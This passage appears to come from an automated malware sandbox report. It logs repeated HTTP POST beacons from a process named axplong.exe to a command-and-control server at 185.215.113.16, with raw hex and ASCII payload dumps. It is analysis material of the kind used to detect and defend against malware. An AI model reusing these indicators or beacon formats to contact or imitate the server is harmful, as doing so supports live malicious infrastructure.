                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:40.383377075 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    6 | 192.168.2.7 | 49710 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:02:40.493055105 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:41.264971972 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:41.278851986 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:41.530005932 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    7 | 192.168.2.7 | 49711 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:02:41.651669025 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:42.404449940 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:42.405474901 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:42.992793083 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0
                    Jul 26, 2024 21:02:42.996925116 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    8 | 192.168.2.7 | 49712 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:02:43.102674961 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:43.896238089 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:43 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:43.897070885 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:44.151859999 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    9 | 192.168.2.7 | 49713 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:02:44.258765936 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:45.010471106 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:45.011152983 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:45.285676956 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    10 | 192.168.2.7 | 49714 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:02:45.402669907 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:46.154237032 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:46.154984951 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:46.403369904 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    11 | 192.168.2.7 | 49715 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:02:46.524625063 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:47.281588078 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:47.282552958 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:47.532128096 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    12 | 192.168.2.7 | 49716 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:02:47.652462006 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:48.402504921 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:48 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:48.403135061 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:48.655883074 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:48 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    13 | 192.168.2.7 | 49717 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:02:48.778496981 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:49.623302937 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:49 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:49.661458969 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:49.961575031 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:49 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    14 | 192.168.2.7 | 49718 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:02:50.086934090 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:50.846751928 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:50.849395037 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:51.127945900 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    15 | 192.168.2.7 | 49719 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:02:51.243587017 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:52.146954060 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:52.152183056 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:52.403475046 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    16 | 192.168.2.7 | 49720 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:02:52.656507015 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:53.470457077 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:53.471230984 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:53.723408937 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    17 | 192.168.2.7 | 49721 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
